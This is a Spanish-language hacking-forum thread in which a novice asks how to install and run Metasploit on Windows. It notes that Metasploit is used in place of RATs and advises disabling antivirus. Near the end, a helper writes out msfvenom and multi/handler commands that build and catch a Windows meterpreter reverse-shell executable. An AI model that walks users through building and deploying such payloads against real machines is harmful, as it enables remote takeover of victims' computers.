[Metasploit Windows]

Buenas comunidad de Underc0de, he leido que ahora se usa mas el metasploid que los RAT. El usuario @DtxdF me ha pasado los links para poder conseguir el metasploit pero me surgio un problema. Tengo un windows 32 bits y en la pagina de descarga : https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version solo hay para 64 bits y no puedo utilizaro. ¿Hay alguna version para 32 bits? en ese caso porfavor decirme que version puedo utilizar y en donde puedo conseguirlo. Gracias comunidad.

Sobre lo que me dijiste por mensajes privados: Metasploit pro, ofrece mas utilidades como evacion de anti virus, ofrece una interfaz gráfica (GUI) y otras características que no dispone el metasploit convencional o comunity.

Sobre metasploit framework de 32 bits: Te recomiendo que descargues pentestbox (con metasploit), ya que ademas de metasploit trae multitud de herramientas para que pasas un buen rato O tambien puedes descargarlo desde la pagina de rapid7 (que practicamente es lo mismo que lo descargues desde el primer link que te indique), la diferencia es que aqui podras descargar de 32 bits (Aunque si no recuerdo mal, la pagina tenia o tiene un problema cuando seleccionas 32 bits se empezara a descargar la 64 bits). Cuestion de ir probando.

Recomendacion:

*- Descargues pentestbox aunque pese un poco mas, pero disfrutaras de metasploit framework y otra herramientas.
*- Como alternativa a todo esto es que descargues una distribucion de linux y instales metasploit, porque?, mas optimizado. En windows tarda en cargar 5min. para que aparesca el mitico mensaje de metasploit: "Starting metasploit console ...", para esperar unos 20 min a que cargue su logo, posteriormente esperar 5 min a que termine de verificar que no tenga ningun error.

Nota: Si lo usaras en Windows, por lo menos ten el win7 o superior ya que te puede generar errores si usas por ej: winxp

Actualmente yo lo tengo instalado en windows 8 64 bit y funciona pero muy lento a la hora de usar

Nota: Para descargar metasploit framework de 32 bit en la pagina de rapid7 tienes que rellenar un formulario con datos, pueden ser falsos pero recomiendo que algunos sean reales por lo menos.

Fuentes:

*- System requirements: https://www.rapid7.com/products/metasploit/system-requirements/
*- Install metasploit framework in github: https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
*- Pentestbox: https://pentestbox.org/es/

Buenas tengo otra pregunta man ¿el pentestbox tiene un lenguaje distinto o siempre son iguales al otro metasploit? otra de las consultas era si el metasploit pro tiene alguna version gratuita.

@pacosomaloso

¿el pentestbox tiene un lenguaje distinto o siempre son iguales al otro metasploit?

No se a que referencia tratas de hacer con un lenguaje distinto. Si en tal caso te refieres al lenguaje de programación en que esta creado metasploit es ruby, sin embargo tiene algunas utilidades, exploits, etc de distintos lenguajes, Si te refieres si cambiara la funcionalidad si la uso en una distribucion u otra, No, sera por igual en la mayoría de cosas.

metasploit pro tiene alguna version gratuita.

Si no me equivoco la misma pagina de rapid7 hay una versión pro gratuita por un periodo de tiempo determinado.

Me baje el metasploit y me lleno de virus desde la pagina oficial xD , el box tambien?

Desactive el antivirus era algo obvio , tengo otra duda... ¿como ejecuto el metasploit? ando mirando clases de metasploit pero no se como ejecutarlo. No hay ningun acceso directo.

@pacosomaloso

Claro que te va a detectar que es un virus ya que es un herramienta de explotación donde contiene multitud de cargas útiles, exploits, etc, hasta el anti virus con menos funciones lo detectaría. Esta bien que hayas desactivado el AV.

Para ejecutarlo en tal caso de que lo hayas hecho en windows, solo coloca en el buscador metasploit, click en "metasploit - console" y tendras que esperar un rato (de verdad cuando te digo un rato es que esperes algo de tiempo, por lo tanto tendras que ser paciente, aunque tambien depende de las características de tu dispositivo), se te abrira una ventana de comandos, al principio no te aparecera nada, a los cinco minutos aprox. te indicara "Starting de metasploit framework ..." (o algo parecido) y esperas a que cargue.

En linux (distribuciones), solo ejecuta el siguiente comando, una vez instalado: "msfconsole" y empezara a cargar.

Recomendaciones si lo usaras en windows:

*- Aprende a como usarlo antes de ejecutarlo: ya que si en tal caso esperas 1 hora aprox. a que cargue por lo menos no tendras que perder otro tiempo en aprender.
*- Si tu dispositivo no tiene caracteristicas notables o extrabagantes solo cierra las aplicaciones y programas que estes usando.
*- Para ejecutar las demas herramientas de metasploit solo debes dirigirte a la ruta de donde lo instalastes: ej: "c:\metasploit". msfconsole en windows es (console.bat) msfvenom es (msfvenom.bat), etc.

Recomendaciones en linux:

*- Aqui es mas sencillo, solo ejecuta esas herramientas en cualquier ruta y listo.

Buenas me aparece esto , no me aparece ningun ejecutable en el buscador para iniciar Metasploit. Otra de las preguntas es.. ¿una vez iniciado tengo que abrir esos bats para entrar a consola desde el metasploit ya iniciado? gracias por tu paciencia.

@pacosomaloso

¿una vez iniciado tengo que abrir esos bats para entrar a consola desde el metasploit ya iniciado?

No, lo que me refería con esos archivos de secuencia de comandos, es que hay herramientas que están como interconectadas con metasploit, agrego, para generar una carga útil de un formato ejecutable donde puedas obtener una sesión necesitas msfvenom (Una herramienta de metasploit para generar cargas útiles ejecutables, ej: generar un archivo malicioso para windows llamado: nomeejecutesquesoyunvirus.exe).

no me aparece ningún ejecutable en el buscador para iniciar Metasploit.

Deberia aparecerte. En tal caso de que no, solo ve a la ruta donde lo instalastes y ejecuta el archivo de secuencias de comandos console.bat.

Ahi los encontre ¿que diferencia tiene venom y console? ando viendo un cuso de dragonJ. nose si me servira . Gracias por las respuestas

@pacosomaloso

¿que diferencia tiene venom y console?

MetaSploit Framework Console (MSFConsole): Es la consola o mejor dicho, la suite de metasploit para controlar las pruebas de penetración.

MetaSploit Framework Venom (MSVenom): Como te mencione anteriormente en los comentarios, es una herramienta de metasploit que se encarga de generar cargas utiles (malware/virus que dispone a hacer una acción del atacante) en ejecutables de muchos formatos.

Sobre Los cursos

En mi opinión irrelevante para muchos, no es necesario que veas cursos/libros/etc de metasploit, ya que hay cantidades extravagantes de información en la web. Fácilmente usa tu buscador para encontrar una duda que tengas sobre metasploit o por lo menos busca los comandos basicos y veras que te hara mas simple el uso de este mismo.

Gracias hermano , ando estudiando un curso para entender como funciona el metasploit. Si tienes algo para aportarme para aprender sobre metasploit se le agradeceria colega. Saludos !

Ando leyendo en un curso y hay comandos como : "Cat" o "pwd". Entre en internet y veo que son comandos para linux. ¿En windows va estos comandos tambien?

@pacosomaloso

Te dire algunos comandos basicos:

Consola de metasploit:

use <modulo> :: Es para seleccionar un modulo de metasploit y usarlo.
reload :: recarga los modulos en tal caso de que se haya agregado un modulo y la consola estuvo abierta
search <coincidencia del modulo o modulo> :: Busca una coincidencia de un modulo cargado de metasploit
set <parametro> :: ajusta un valor de un parametro
show <parametro> :: muestra alguna opcion como puede ser un payload, exploit, auxiliar, etc. EJ: show payloads
options :: lo mismo que que show options
run o exploit :: una vez ajustado todas las opciones, arrancas o inicias el exploit

MSFVenom:

-p <payload> :: selecciona una carga útil de la lista de payloads
-h, --help :: ver la ayuda
LHOST=<tu direccion ip/nombre del host/dns/etc> :: LHOST (Local HOST) Tu direccion para establecer una conexion entre metasploit y la carga util
LPORT=<tu puerto local> :: Establece el puerto donde recibiras la conexion
-f <formato de la carga útil> :: El formato de la carga util por ejemplo: raw. Generara una carga util dependiendo de la extension del archivo usando el parametro con -o, si en tal caso no se especifica una extension se usara el formato de un ejecutable de windows
-o <nombre del archivo a generar> :: Nombre de la carga util, si no se especifica el -f y colocas el nombre por ejemplo: .exe, .ps1 se creara con ese formato. En tal caso de que sea lo contrario y especificas -f por ejemplo: -f exe y colocas en el parametro -o .ps1, .txt, etc, se creara con esa extension pero con el formato exe (un ejecutable de windows)

Aqui una lista de payloads disponibles (OJO: no se si esta actualizada), con el mismo msfvenom puedes ver la lista (Pero no recuerdo el parametro :/): https://superuser-ltd.github.io/2017/msfvenom-payloads/

Un ejemplo de comandos que se usuarian en una prueba de penetracion:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4445 -f raw -o payload.exe
msfconsole
use exploit/multi/handler
set lhost 192.168.2.2
set lport 4445
set payload windows/meterpreter/reverse_tcp
exploit

Si deseas hablar mas sobre el tema, escribeme en privado (con gusto respondere dependiendo de mis conocimientos) ya que este tema esta solucionado.

Ando leyendo en un curso y hay comandos como : "Cat" o "pwd". Entre en internet y veo que son comandos para linux. ¿En windows va estos comandos tambien?

En windows, son parecidos en las funciones (En la mayoria de casos), cat es equivalente a type en windows (Su función es ver el contenido de un archivo), pwd es equivalente a cd en windows (Su función es ver la ruta actual)

Dale men ahi te mande dos mensajes privados. Saludos.

Hola, Metasploit podría correr en LUBUNTU?  Netbook 1g ram